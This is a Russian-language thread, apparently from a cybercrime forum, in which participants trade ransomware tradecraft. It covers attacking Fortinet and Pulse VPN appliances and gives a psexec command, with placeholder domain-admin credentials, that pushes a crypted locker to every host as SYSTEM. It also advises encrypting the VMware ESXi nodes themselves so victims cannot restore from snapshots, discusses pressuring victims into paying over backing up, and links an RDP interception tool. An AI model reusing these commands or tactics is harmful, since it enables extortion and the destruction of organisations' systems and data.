Пожалуйста, обратите внимание, что пользователь заблокирован
Правереал пора штуки Fortinet и ничиво не выходит
Потому что пару штук, а не пару сотен..Правереал пора штуки Fortinet и ничиво не выходит
К чему ты намекаешь?Потому что пару штук, а не пару сотен..
2-3 штуки это не показатель)К чему ты намекаешь?
Ну я согласно с тобой ,проста так для тест c fortinet. А на pulse vpn идёт прекрасно2-3 штуки это не показатель)
получил домен админа криптанул локер psexec.exe @ip.txt -u userDA -p passwordDA -s -d -c путь к локеру.exe ждем 5 минут локер запустился на всех тачках от имени системыПри таком способе в любом случае нужно расшаривать и подключать диски или нет? Софт который ползет по сети не сможет без этого проникнуть?
Етого мне нехвалополучил домен админа криптанул локер psexec.exe \\ip.txt -u userDA -p passwordDA -s -d -c петь к локеру.exe ждем 5 минут локер запустился на всех тачках от имени системы
что нужно а что нет я сам разберусьЕтого мне нехвало
пытаюсь разобраться сам
ты удали ето ненужное
есче не закрытие сезона охоты на волков
Есть один вопрос
сильнейшее колдунство про которое я слыхал, статья the best! продолжай держать планку нереального контента.что нужно а что нет я сам разберусь
насчет охоты на волков мне советы ни твои ни чьи либо не нужны что я делаю это мое дело но никак не твое
если вопросы есть по существу пиши
5 минут и админ все востановил со снепшетов esxi)получил домен админа криптанул локер psexec.exe \\ip.txt -u userDA -p passwordDA -s -d -c путь к локеру.exe ждем 5 минут локер запустился на всех тачках от имени системы
не всегда есиксы то еще гумно согласен5 минут и админ все востановил со снепшетов esxi)
может сделаешь ман по их эксплоиту?5 минут и админ все востановил со снепшетов esxi)
согласись не всегда компания рискует делать бекапы так как бекап системы у них установлены НО они не всегда тестируются и тут перед админом есть выбор либо делать бекап с риском что чтото пойдет не так либо платить5 минут и админ все востановил со снепшетов esxi)
Ты смотри всторону шифрования самих нод вмварысогласись не всегда компания рискует делать бекапы так как бекап системы у них установлены НО они не всегда тестируются и тут перед админом есть выбор либо делать бекап с риском что чтото пойдет не так либо платить
https://github.com/SySS-Research/Seth а второй кто нить подскажет или тоже самое но ручками?чето лень) много букав надо вбивать, тем более способов знаю 2ва)